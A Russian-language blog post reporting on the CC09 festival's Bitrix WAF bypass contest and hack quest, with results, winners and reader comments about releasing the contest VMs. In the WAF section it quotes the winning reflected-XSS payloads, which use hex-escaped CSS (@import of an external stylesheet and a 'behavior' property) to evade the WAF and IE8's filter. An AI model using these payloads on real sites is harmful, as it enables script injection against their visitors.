Мероприятие прошло на позитивной волне (фотки), многие работы (демо && realtime coding) произвели на меня сильное впечатление и оставили приятный шлейф, что присутствую в этом коллективе. Вообще, безусловно, не часто встретишь столько талантливых людей в одном месте. Атмосфера на фестивале была замечательная! Но и имели место быть разного рода косяки с падением каналов и пр. в том числе в хак-зоне... Но они, конечно же, не могли испортить хорошего настроения, в котором все прибывали :)
В этом году CC09 был гораздо масштабнее, чем в предыдущие годы. Например, можно было наблюдать за всем происходящим в режиме реального времени удаленно (трансляция фестиваля велась через youtube). Также, в этом году свой вклад внесла команда Positive Technologies по тематике hack quest и realtime bitrix waf hack (совместно с разработчиками CMS Bitrix). Так как тема по этим конкурсам мне близка, то о них дальше и пойдет речь.
Realtime Bitrix WAF Hack
Обойти Bitrix WAF пытались многие (более 25.000 попыток проведения атаки) и до последних минут завершения конкурса, но обойти фильтры от уязвимостей SQL Injection, Path Traversal/LFI так никто и не сумел. Однако пробить по трем векторам атаки Cross-Site Scripting двум участникам конкурса все-таки удалось. И таблица победителей выглядит следующим образом:
Первое место - Владимир Воронцов (ака d0znp) сумел проэксплуатировать уязвимость типа "Межсайтовое выполнение сценариев" отраженного типа, в том числе, эксплуатация уязвимости была продемонстрирована в обход фильтра IE 8 xss filter. Действительно заслуженное первое место. А вот и сами запросы для атаки:
<style>@\69\6d\70\6f\72\74 'http://onsec.ru/xss.css';</style>
<div style="'\62\65\68\61\76\69\6F\72:">1</div>
Второе место занял человек, скрывающийся под псевдонимом "insa". Он откопал отраженный XSS, причем ошибка содержалась только на игровом сервере (опечатка при подготовке сервера). Но условия конкурса были выполнены, поэтому "insa" получил заслуженное второе место.
Третье место решили отдать "ParanoidChaos", который больше копал не waf, а саму CMS’ку Битрикс. И его раскопки позволили выявить пару незначительных багов – "Раскрытие корневого каталога Web-сервера" в конфигурации отличной от дефолтовой (не на игровом сервере). За проявленный энтузиазм "ParanoidChaos" занял третье место и в момент вручения подарка (коммерческой версии Битрикс) сказал, что продолжит исследования по анализу защищенности этой CMS. Хочется надеяться, что исследования будут носить мирный характер, а не провокационный, как то hack video по эксплуатации XSS в Битриксе, которое демонстрировалось на главном экране фестиваля...(кстати уже fixed).
Hack Quest
В этом году, как я и обещал, был подготовлен интересный хак-квест, который со слов игроков всем понравился. Безусловно, приятно, что работа, которая выполнялась "с душой", была высоко оценена. Из всех подготовленных этапов хак-квеста, только один не смог пройти никто. Это этап по реверсингу программки crackme (главный разработчик систем ИБ в Positive Technologies сумел ее отреверсить за четыре часа). Таблица почета по конкурсу Hack Quest 09:
Первое место присвоено "r0b". Он сумел пройти все этапы конкурса, за исключением этапа с crackme. К сожалению, мы с ним попрощались в районе часа второго дня и на церемонию награждения он не вернулся. Поэтому награждали вторых по количеству заработанных очков – это команда Antichat с результатом в минус один прошедших конкурсов и не раскопавших второго бонусного ключа. Подробности опубликованы на форуме CC.
ЗЫ: в ближайшее будущее опубликую, как нужно было проходить конкурс (и как проходили некоторые его этапы... вернее обходили:))
В целом мероприятие оставило хорошее впечатление, надеюсь, что большинство его со мной разделяют. До новых встреч на подобных мероприятиях!
А тяжело будет опубликовать образы с серваков которые надо было сломать?
ОтветитьУдалитьЯ как не участвующий хотел бы попробовать пройти ;) Думаю, таких много. Например с CTF-ов всяких всегда образы дают.
технически, собсем не тяжело. думаю можно будет выложить... с Тохой согласую и выложу тогда.
ОтветитьУдалитьзавтра видимо выложим...
ОтветитьУдалитьклассный конкурс был!
ОтветитьУдалитьхотя я только 3 квеста выполнил
спасибо!
crackme буду реверсить;)
ну что же, завтра/послезавтра виртуалки с этапами конкурсов можно будет скачать на securitylab. если будет желание, то...
ОтветитьУдалитьИ в скором времени разойдется подробное описание, как нужно (можно) было проходить хак-квест, в том числе, как отреверсить кодовое слово из crackme:)
Дмитрий я бы хотел бы ещё раз поиграться с обходом WAF, который был на конкурсе
ОтветитьУдалитьесли можно куда-нибудь выложить или пришлите мне копию движка я локально посмотрю
спасибо
Роман, у тебя же есть лицензионная версия движки Битрикс. Правда, она немного устаревшая. Поставь ее и накати обновления через siteupdate. Там уже пофиксенная версия waf, покопай ее:)
ОтветитьУдалить>> завтра/послезавтра виртуалки с этапами конкурсов можно будет скачать на securitylab
ОтветитьУдалитьпоправка. ожидаем в понедельник 7.09.09
~~> в ближайшее будущее опубликую, как нужно было проходить конкурс (и как проходили некоторые его этапы... вернее обходили:))
ОтветитьУдалитьочень хотелось бы почитать, нет хоть приблизительной даты появления публикации?
предположительно, описание по прохождению будет опубликовано на следующей неделе. я даже думаю в понедельник (14.09.09). первоисточник - party.cc.org.ru. если нам разрешат, то скопипастим на секлаб:) ну и тут, конечно распишу что-нить интересное...
ОтветитьУдалитьуже 19 число, не передумали вы написать прохождение?
ОтветитьУдалитьпрохождение было написано еще до начала CC:)
ОтветитьУдалитьсейчас процесс завис на Токсе... он должен был опубликовать на этой неделе. но, вот уже 19-ое число... я в свою очередь (по этическим соображениям) тоже не могу опубликовать до момента, когда это не появится на оф. сайте мероприятия party.cc.org.ru ждем...
Итоги CC09 Bitrix Waf на английский манер:
ОтветитьУдалить1. http://www.bitrixsoft.com/company/blog/Alex_Reznor/1260.php
2. http://gordeys.blogspot.com/2009/10/some-plug-about-bitrix.html